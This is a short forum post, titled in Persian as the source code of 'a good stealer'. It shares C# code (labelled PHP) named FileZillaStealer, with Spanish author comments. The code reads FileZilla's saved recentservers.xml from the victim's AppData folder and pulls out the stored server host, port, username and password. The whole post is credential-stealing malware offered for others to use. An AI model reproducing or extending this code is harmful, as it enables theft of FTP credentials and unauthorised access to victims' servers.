سورس یه استیلر خوب
کد PHP:
namespace FileZillaStealer
{
class FileZillaStealer
{
public void FileZillaStealer()
{
//Nombre: Filezilla Stealer
//Autor: Bloc
//Fecha Publicada: 11/08/2013
//Requerimientos: Dejar la fuente.
string DocumentoXml = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString() + "\\Filezilla\\recentservers.xml";
string StrHost;
string StrPort;
string StrUser;
string StrPass;
DataSet Ds = new DataSet();
Ds.ReadXml(DocumentoXml);
StrHost = Ds.Tables["Server"].Rows[0]["Host"].ToString();
StrPort = Ds.Tables["Server"].Rows[0]["Port"].ToString();
StrUser = Ds.Tables["Server"].Rows[0]["User"].ToString();
StrPass = Ds.Tables["Server"].Rows[0]["Pass"].ToString();
}
}
}